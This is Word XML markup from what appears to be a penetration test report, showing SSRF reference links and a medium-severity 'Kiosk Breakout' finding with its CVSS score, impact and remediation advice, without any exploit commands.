          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, malicious</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4E5A91DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> domains, IP address, and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4E5A91DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>protoco</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4E5A91DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="53A9ED11" w14:textId="6324AA0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127714A6" w:rsidP="0D325B6E" w:rsidRDefault="127714A6" w14:paraId="7B1D33A4" w14:textId="51E3B48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7714A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DDA0F22" w:rsidP="0D325B6E" w:rsidRDefault="4DDA0F22" w14:paraId="31E1045C" w14:textId="0546426D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R2afc84771dab44aa">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4DDA0F22">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP </w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="5FC67927">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4DDA0F22">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4DDA0F22">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Server Side</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4DDA0F22">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t xml:space="preserve"> Request Forgery (SSRF)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3E22AC59" w:rsidP="0D325B6E" w:rsidRDefault="3E22AC59" w14:paraId="70BB7928" w14:textId="4D54D5F5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="finding-hidden-attack-surface-for-ssrf-vulnerabilities" r:id="R38e5090220ba42f7">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="3E22AC59">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Portswigger</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="3E22AC59">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="69308F70">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="3E22AC59">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t xml:space="preserve"> What is SSRF?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7E348AEE" w14:textId="68961C84">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB7587" w:rsidP="0D325B6E" w:rsidRDefault="00DB7587" w14:paraId="1E84E85F" w14:textId="72CE3D0F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc524860651" w:id="731014501"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="00DB7587">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="00DB7587">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="00DB7587">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kiosk Breakout</w:t>
      </w:r>
      <w:bookmarkEnd w:id="731014501"/>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20"/>
        <w:gridCol w:w="2460"/>
        <w:gridCol w:w="4350"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7D35677D">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F64CC9C" w14:textId="3E12A34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91FDC58" w14:textId="600BF86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F9908B" w14:textId="4AFCB18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42AB162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DE774A" w14:textId="2E78954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57D223A" w14:textId="10550C4E">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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246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719C3D7" w:rsidP="0D325B6E" w:rsidRDefault="0719C3D7" w14:paraId="2590EF7A" w14:textId="43FAEFCA">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0719C3D7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>5.9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4CBB97EF" w14:textId="5EA9E19D">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6BEFAAC2">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880E906" w14:textId="5641C84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77E5C03" w14:textId="4F260AF5">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFC000"/>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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2460" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41EDC4FA"/>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E134CA5"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="66B398B2">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81BADB" w14:textId="448507F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E4AA3EC" w:rsidP="0D325B6E" w:rsidRDefault="7E4AA3EC" w14:paraId="0868CE41" w14:textId="2C1456D0">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L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" r:id="Re05153af25534135">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7E4AA3EC">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:L</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AC:L</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AT:N</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PR:N</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UI:N</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VC:L</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VI:L</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VA:L</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SC:N</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SI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7E4AA3EC">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7E4AA3EC">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6581BC1B">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EA337E4" w14:textId="455504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CF1B5F6" w14:textId="29C7E13B">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1F67711" w14:textId="50363CD0">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rffb1816ced13461d">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4AABCC78">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>611:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4AABCC78">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Escape to Host</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="18548D7E">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3889E3D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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1FA0FD" w14:textId="6C1209E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E07A583" w:rsidP="0D325B6E" w:rsidRDefault="7E07A583" w14:paraId="69821A8A" w14:textId="3A77977D">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rd1472409a43d4484">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7E07A583">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1026: Privileged Account Management</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="418CAEBA" w14:textId="4D5ED3DE">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R2d850871705e4e89">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">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2F87B944">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="321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68FE4E" w14:textId="026F02B5">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FA62FDA" w14:textId="67FA7075">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1A3D130" w14:textId="6CE9A0C5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DB7587" w:rsidP="0D325B6E" w:rsidRDefault="00DB7587" w14:paraId="54470B8F" w14:textId="2A8BE1C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EAED1CB" w:rsidP="0D325B6E" w:rsidRDefault="1EAED1CB" w14:paraId="55B15C3C" w14:textId="07068C1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EAED1CB">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is able to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1EAED1CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>breakout</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1EAED1CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the restricted environment and access the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="11AED831">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">underlying </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1EAED1CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>computer environment.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="06DC913C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> After breaking out of the restricted environment, the user can access sensitive files and perform arbitrary PowerShell commands as </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="06DC913C">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06DC913C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> high-privilege user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="67BB6558" w14:textId="2065524E">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0DB7587" w:rsidP="0D325B6E" w:rsidRDefault="00DB7587" w14:paraId="57676798" w14:textId="6F603AE1">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0DB7587">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8914A5E" w:rsidP="0D325B6E" w:rsidRDefault="28914A5E" w14:paraId="02022CDF" w14:textId="1341233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8914A5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Successfully breaking out of the kiosk allows an attacker to access potentially private documents on the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5B21F4A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>machine and</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="28914A5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow them to escalate to higher privilege users and gain more control over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3157FB46" w14:textId="07125321">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0DB7587" w:rsidP="0D325B6E" w:rsidRDefault="00DB7587" w14:paraId="0EA762BF" w14:textId="06D926C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0DB7587" w:rsidP="0D325B6E" w:rsidRDefault="00DB7587" w14:paraId="25F03E39" w14:textId="7DE8453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p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7C7524F2" w14:textId="79211A5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0DB7587" w:rsidP="0D325B6E" w:rsidRDefault="00DB7587" w14:paraId="355DE47E" w14:textId="2C05448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0DB7587" w:rsidP="0D325B6E" w:rsidRDefault="00DB7587" w14:paraId="5A6AD530" w14:textId="4CF0D02E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>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0DB7587">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AD66336" w:rsidP="0D325B6E" w:rsidRDefault="5AD66336" w14:paraId="013ECC35" w14:textId="66DD2E31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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AD66336">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the kiosk as a restricted user with </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="40D93A4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no privileged permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="40D93A4F" w:rsidP="0D325B6E" w:rsidRDefault="40D93A4F" w14:paraId="77D4FA4B" w14:textId="0C807D84">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>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0D93A4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Disallow the ability to open arbitrary files or access PowerShell and Command Prompt, to prevent </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 xml:space="preserve">further abuse if a user performs a </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succe</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="646F3CD0">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sful</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 xml:space="preserve"> kiosk breako</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u</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7440A8B3">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1F0B5A30" w14:textId="52C13F10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="16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0DB7587" w:rsidP="0D325B6E" w:rsidRDefault="00DB7587" w14:paraId="327AA90F" w14:textId="51E3B48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0DB7587">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EF283EB" w:rsidP="0D325B6E" w:rsidRDefault="0EF283EB" w14:paraId="5C86A372" w14:textId="1EC47BA8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
